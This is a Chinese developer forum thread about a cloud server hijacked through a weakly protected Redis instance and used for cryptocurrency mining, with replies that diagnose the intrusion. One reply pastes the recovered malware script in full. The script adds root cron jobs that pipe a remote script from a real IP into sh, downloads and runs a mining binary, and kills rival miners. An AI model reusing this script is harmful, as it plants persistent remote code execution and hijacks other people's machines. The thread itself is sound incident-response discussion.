1

最近突然发现一个阿里云服务器cpu占用异常,而且短时间内有多次登录失败记录;请问有人了解吗?

clipboard.png
几分钟没有登录就已经有三百多次失败记录
使用top查看发现该进程

clipboard.png
该进程的运行文件是一个在/tmp/文件夹下的qW3xT可执行文件

clipboard.png
查看进程树如下

clipboard.png

2018-05-31 提问
5 个回答
3

已采纳

crontab -l查看一下任务
有任务的话 杀死 看看脚本文件位置 删除

1

遇到过,关闭定时任务,修改reids密码,重启一下就可以了,应该是挖矿的

0

谢谢两位大佬,确实是个挖矿脚本,被设置了定时任务,经验不足。
应该是redis密码太弱,被扫到了,希望大家设置redis不要使用简单密码,执行脚本我下下来了

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/root
echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/crontabs/root
echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/crontabs/root

ps auxf | grep -v grep | grep /tmp/ddgs.3011 || rm -rf /tmp/ddgs.3011
if [ ! -f "/tmp/ddgs.3011" ]; then
    curl -fsSL http://165.225.157.157:8000/static/3011/ddgs.$(uname -m) -o /tmp/ddgs.3011
fi
chmod +x /tmp/ddgs.3011 && /tmp/ddgs.3011

ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill

供参考
另外发现在reids被利用之后,有一个ip每几分钟就会尝试登录服务器,持续到现在

0

我的服务器今天也是被这个挖坑的程序一直占用cpu 99%

0

不知道redis最好不要开端口吗?要开也不能开默认端口啊

撰写答案

你可能感兴趣的

推广链接